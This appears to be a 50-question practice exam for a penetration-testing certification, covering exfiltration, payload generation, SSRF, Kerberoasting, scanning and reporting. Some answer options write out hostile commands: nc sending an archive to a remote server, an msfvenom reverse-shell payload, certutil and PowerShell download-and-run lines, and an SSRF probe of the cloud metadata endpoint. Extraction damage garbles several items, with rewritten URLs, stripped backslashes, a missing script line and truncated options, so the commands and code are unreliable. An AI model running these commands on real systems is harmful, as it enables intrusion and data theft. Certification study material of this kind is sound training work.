1.

During a security assessment, a penetration tester gains access to an internal server

and manipulates some data to hide its presence.

Which of the following is the best way for the penetration tester to hide the activities
performed?

Clear the Windows event logs.

Modify the system time.
Alter the log permissions.
Reduce the log retention settings.
2. A tester enumerated a firewall policy and now needs to stage and exfiltrate data
captured from the

engagement.

Given the following firewall policy:

Action | SRC

| DEST

| --

Block | 192.168.10.0/24: 1-65535 | 10.0.0.0/24: 22 | TCP

Allow | 0.0.0.0/0: 1-65535 | 192.168.10.0/24:443 | TCP

Allow | 192.168.10.0/24: 1-65535 | 0.0.0.0/0:443 | TCP

Block |. | . | *

Which of the following commands should the tester try next?

tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz

gzip /path/to/data && cp data.gz <remote_server> 443
gzip /path/to/data && nc -nvlk 443; cat data.gz ' nc -w 3 <remote_server> 22
tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
3. Which of the following elements in a lock should be aligned to a specific level to allow
the key cylinder to turn?

Latches
Pins
Shackle
Plug
4. A penetration tester assesses an application allow list and has limited command-line
access on the Windows system.

Which of the following would give the penetration tester information that could aid in
continuing the test?

mmc.exe
 icacls.exe
nltest.exe
rundll.exe
5. A penetration tester wants to use multiple TTPs to assess the reactions (alerted,
blocked, and others) by the client’s current security tools. The threat-modeling team
indicates the TTPs in the list might affect their internal systems and servers.

Which of the following actions would the tester most likely take?

Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.
Perform an internal vulnerability assessment with credentials to review the internal attack
surface.
Use a generic vulnerability scanner to test the TTPs and review the results with the threat-
modeling team.
Perform a full internal penetration test to review all the possible exploits that could affect the
systems.
6. As part of a security audit, a penetration tester finds an internal application that accepts
unexpected user inputs, leading to the execution of arbitrary commands.

Which of the following techniques would the penetration tester most likely use to access
the sensitive data?

Logic bomb
SQL injection
Brute-force attack
Cross-site scripting
7. A penetration tester identifies an exposed corporate directory containing first and last
names and phone numbers for employees.

Which of the following attack techniques would be the most effective to pursue if the
penetration tester wants to compromise user accounts?

Smishing
Impersonation
Tailgating
Whaling
8. A penetration tester is compiling the final report for a recently completed engagement.
A junior QA team member wants to know where they can find details on the impact,
overall security findings, and high-level statements.

Which of the following sections of the report would most likely contain this information?

Quality control
Methodology
Executive summary
Risk scoring
9. A tester completed a report for a new client.

Prior to sharing the report with the client, which of the following should the tester request
to complete a review?

A generative AI assistant
The customer's designated contact
A cybersecurity industry peer
A team member
10. During an assessment, a penetration tester exploits an SQLi vulnerability.

Which of the following commands would allow the penetration tester to enumerate
password hashes?

sqlmap -u www.example.com/?id=1 --search -T user

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred
sqlmap -u www.example.com/?id=1 --tables -D accounts
sqlmap -u www.example.com/?id=1 --schema --current-user --current-db
11. During an assessment, a penetration tester obtains an NTLM hash from a legacy
Windows machine.

Which of the following tools should the penetration tester use to continue the attack?

Responder
Hydra
BloodHound
CrackMapExec
12. A penetration tester needs to collect information over the network for further steps in
an internal assessment.

Which of the following would most likely accomplish this goal?

ntlmrelayx.py -t 192.168.1.0/24 -1 1234

nc -tulpn 1234 192.168.1.2
responder.py -I eth0 -wP
crackmapexec smb 192.168.1.0/24
13. A penetration tester wants to use the following Bash script to identify active servers
on a network:

1 network_addr="192.168.1"

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo "Host $h is up"

6 else

7 echo "Host $h is down"

8 fi

9 done

Which of the following should the tester do to modify the script?

Change the condition on line 4.

Add 2>&1 at the end of line 3.
Use seq on the loop on line 2.
Replace $h with ${h} on line 3.
14. A penetration tester is attempting to discover vulnerabilities in a company's web
application.

Which of the following tools would most likely assist with testing the security of the web
application?

OpenVAS
Nessus
sqlmap
Nikto
15. A penetration tester needs to launch an Nmap scan to find the state of the port for
both TCP and UDP services.

Which of the following commands should the tester use?

nmap -sU -sW -p 1-65535 example.com

nmap -sU -sY -p 1-65535 example.com
nmap -sU -sT -p 1-65535 example.com
nmap -sU -sN -p 1-65535 example.com
16. A tester plans to perform an attack technique over a compromised host.

The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f

csharp

The tester then takes the shellcode from the msfvenom command and creates a file called
evil.xml.

Which of the following commands would most likely be used by the tester to continue
with the attack on the host?

regsvr32 /s /n /u C:evil.xml
MSBuild.exe C:evil.xml
mshta.exe C:evil.xml
 AppInstaller.exe C:evil.xml
17. A tester performs a vulnerability scan and identifies several outdated libraries used
within the customer SaaS product offering.

Which of the following types of scans did the tester use to identify the libraries?

IAST
SBOM
DAST
SAST
18. A penetration tester performs an assessment on the target company's Kubernetes
cluster using kube-hunter.

Which of the following types of vulnerabilities could be detected with the tool?

Network configuration errors in Kubernetes services

Weaknesses and misconfigurations in the Kubernetes cluster
Application deployment issues in Kubernetes
Security vulnerabilities specific to Docker containers
19. A penetration tester needs to confirm the version number of a client's web application
server.

Which of the following techniques should the penetration tester use?

SSL certificate inspection

URL spidering
Banner grabbing
Directory brute forcing
20. Given the following statements:

Implement a web application firewall.

Upgrade end-of-life operating systems.

Implement a secure software development life cycle.

In which of the following sections of a penetration test report would the above statements
be found?

Executive summary
Attack narrative
Detailed findings
Recommendations
21. During a penetration test, a tester captures information about an SPN account.

Which of the following attacks requires this information as a prerequisite to proceed?

Golden Ticket
 Kerberoasting
DCShadow
LSASS dumping
22. A penetration tester attempts to run an automated web application scanner against a
target URL. The tester validates that the web page is accessible from a different device.

The tester analyzes the following HTTP request header logging output:

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl

200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python

Which of the following actions should the tester take to get the scans to work properly?

Modify the scanner to slow down the scan.

Change the source IP with a VP
Modify the scanner to only use HTTP GET requests.
Modify the scanner user agent.
23. During a penetration test, a junior tester uses Hunter.io for an assessment and plans
to review the information that will be collected.

Which of the following describes the information the junior tester will receive from the
Hunter.io tool?

A collection of email addresses for the target domain that is available on multiple sources on
the internet
DNS records for the target domain and subdomains that could be used to increase the
external attack surface
Data breach information about the organization that could be used for additional
enumeration
Information from the target's main web page that collects usernames, metadata, and
possible data exposures
24. A penetration tester downloads a JAR file that is used in an organization's production
environment. The tester evaluates the contents of the JAR file to identify potentially
vulnerable components that can be targeted for exploit.

Which of the following describes the tester's activities?

SAST
SBOM
ICS
SCA
25. During a penetration testing engagement, a tester targets the internet-facing services
used by the client.

Which of the following describes the type of assessment that should be considered in this
scope of work?

Segmentation
Mobile
External
Web
26. A penetration tester has just started a new engagement. The tester is using a
framework that breaks the life cycle into 14 components.

Which of the following frameworks is the tester using?

OWASP MASVS
OSSTMM
MITRE ATT&CK
CREST
27. A penetration tester is evaluating a SCADA system. The tester receives local access to
a workstation that is running a single application. While navigating through the
application, the tester opens a terminal window and gains access to the underlying
operating system.

Which of the following attacks is the tester performing?

Kiosk escape
Arbitrary code execution
Process hollowing
Library injection
28. A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make?
(Select two).

Develop a secure encryption algorithm.

Deploy an asset management system.
 Write an SDLC policy.
Implement an SCA tool.
Obtain the latest library version.
Patch the libraries.
29. While conducting a reconnaissance activity, a penetration tester extracts the following
information:

Emails: - [email protected] - [email protected] - [email protected]

Which of the following risks should the tester use to leverage an attack as the next step in
the security assessment?

Unauthorized access to the network

Exposure of sensitive servers to the internet
Likelihood of SQL injection attacks
Indication of a data breach in the company
30. A penetration tester gains access to a host but does not have access to any type of
shell.

Which of the following is the best way for the tester to further enumerate the host and the
environment in which it resides?

ProxyChains
Netcat
PowerShell ISE
Process IDs
31. A penetration tester has found a web application that is running on a cloud virtual
machine instance. Vulnerability scans show a potential SSRF for the same application
URL path with an injectable parameter.

Which of the following commands should the tester run to successfully test for secrets
exposure exploitability?

curl <url>?param=http://169.254.169.254/latest/meta-data/
curl '<url>?param=http://127.0.0.1/etc/passwd'
curl '<url>?param=<script>alert(1)<script>/'
curl <url>?param=http://127.0.0.1/
32. A penetration tester cannot find information on the target company's systems using
common OSINT methods. The tester's attempts to do reconnaissance against internet-
facing resources have been blocked by the company's WAF.

Which of the following is the best way to avoid the WAF and gather information about the
target company's systems?

HTML scraping
Code repository scanning
Directory enumeration
 Port scanning
33. During a penetration test, the tester uses a vulnerability scanner to collect information
about any possible vulnerabilities that could be used to compromise the network.

The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Bypass defensive systems to collect more information.

Use an automation tool to perform the attacks.
Script exploits to gain access to the systems and host.
Validate the results and remove false positives.
34. A penetration tester is working on a security assessment of a mobile application that
was developed in-house for local use by a hospital. The hospital and its customers are
very concerned about disclosure of information.

Which of the following tasks should the penetration tester do first?

Set up Drozer in order to manipulate and scan the application.

Run the application through the mobile application security framework.
Connect Frida to analyze the application at runtime to look for data leaks.
Load the application on client-owned devices for testing.
35. Before starting an assessment, a penetration tester needs to scan a Class B IPv4
network for open ports in a short amount of time.

Which of the following is the best tool for this task?

Burp Suite
masscan
Nmap
hping
36. A penetration tester is performing an authorized physical assessment. During the test,
the tester observes an access control vestibule and on-site security guards near the entry
door in the lobby.

Which of the following is the best attack plan for the tester to use in order to gain access
to the facility?

Clone badge information in public areas of the facility to gain access to restricted areas.
Tailgate into the facility during a very busy time to gain initial access.
Pick the lock on the rear entrance to gain access to the facility and try to gain access.
Drop USB devices with malware outside of the facility in order to gain access to internal
machines.
37. During a web application assessment, a penetration tester identifies an input field that
allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt,
presenting a text box when browsing to the page going forward.
Which of the following types of attacks is this an example of?

SQL injection
SSRF
XSS
Server-side template injection
38. A penetration tester is working on an engagement in which a main objective is to
collect confidential information that could be used to exfiltrate data and perform a
ransomware attack. During the engagement, the tester is able to obtain an internal
foothold on the target network.

Which of the following is the next task the tester should complete to accomplish the
objective?

Initiate a social engineering campaign.

Perform credential dumping.
Compromise an endpoint.
Share enumeration.
39. During a penetration test, the tester identifies several unused services that are
listening on all targeted internal laptops.

Which of the following technical controls should the tester recommend to reduce the risk
of compromise?

Multifactor authentication
Patch management
System hardening
Network segmentation
40. A penetration tester writes the following script to enumerate a 1724 network:

1 #!/bin/bash

2 for i in {1..254}; do

3 ping -c1 192.168.1.$i

4 done
The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token `ping'

Which of the following should the tester do to fix the error?

Add do after line 2.

Replace {1..254} with $(seq 1 254).
Replace bash with tsh.
Replace $i with ${i}.
41. A penetration tester gains initial access to an endpoint and needs to execute a
payload to obtain additional access.

Which of the following commands should the penetration tester use?

powershell.exe impo C:toolsfoo.ps1

certutil.exe -f https://192.168.0.1/foo.exe bad.exe
powershell.exe -noni -encode IE
Downloadstring("http://172.16.0.1/")
rundll32.exe c:pathfoo.dll,functName
42. During a vulnerability assessment, a penetration tester configures the scanner sensor
and performs the initial vulnerability scanning under the client's internal network. The
tester later discusses the results with the client, but the client does not accept the results.
The client indicates the host and assets that were within scope are not included in the
vulnerability scan results.

Which of the following should the tester have done?

Rechecked the scanner configuration.

Performed a discovery scan.
Used a different scan engine.
Configured all the TCP ports on the scan.
43. Which of the following describes the process of determining why a vulnerability
scanner is not providing results?

Root cause analysis

Secure distribution
Peer review
Goal reprioritization
44. During a security audit, a penetration tester wants to run a process to gather
information about a target network's domain structure and associated IP addresses.

Which of the following tools should the tester use?

Dnsenum
Nmap
Netcat
 Wireshark
45. During an external penetration test, a tester receives the following output from a tool:

test.comptia.org

info.comptia.org

vpn.comptia.org

exam.comptia.org

Which of the following commands did the tester most likely run to get these results?

nslookup -type=SOA comptia.org

amass enum -passive -d comptia.org
nmap -Pn -sV -vv -A comptia.org
shodan host comptia.org
46. A penetration tester is developing the rules of engagement for a potential client.

Which of the following would most likely be a function of the rules of engagement?

Testing window
Terms of service
Authorization letter
Shared responsibilities
47. A penetration tester needs to complete cleanup activities from the testing lead.

Which of the following should the tester do to validate that reverse shell payloads are no
longer running?

Run scripts to terminate the implant on affected hosts.

Spin down the C2 listeners.
Restore the firewall settings of the original affected hosts.
Exit from C2 listener active sessions.
48. A penetration testing team wants to conduct DNS lookups for a set of targets provided
by the client.

The team crafts a Bash script for this task.

However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?
 resolvconf $i
rndc $i
systemd-resolve $i
host $i
49. A penetration tester needs to test a very large number of URLs for public access.

Given the following code snippet:

1 import requests

2 import pathlib

4 for url in pathlib.Path("urls.txt").read_text().split("n"):

5 response = requests.get(url)

6 if response.status == 401:

7 print("URL accessible")

Which of the following changes is required?

The condition on line 6

The method on line 5
The import on line 1
The delimiter in line 3
50. As part of an engagement, a penetration tester wants to maintain access to a
compromised system after rebooting.

Which of the following techniques would be best for the tester to use?

Establishing a reverse shell

Executing a process injection attack
Creating a scheduled task
Performing a credential-dumping attack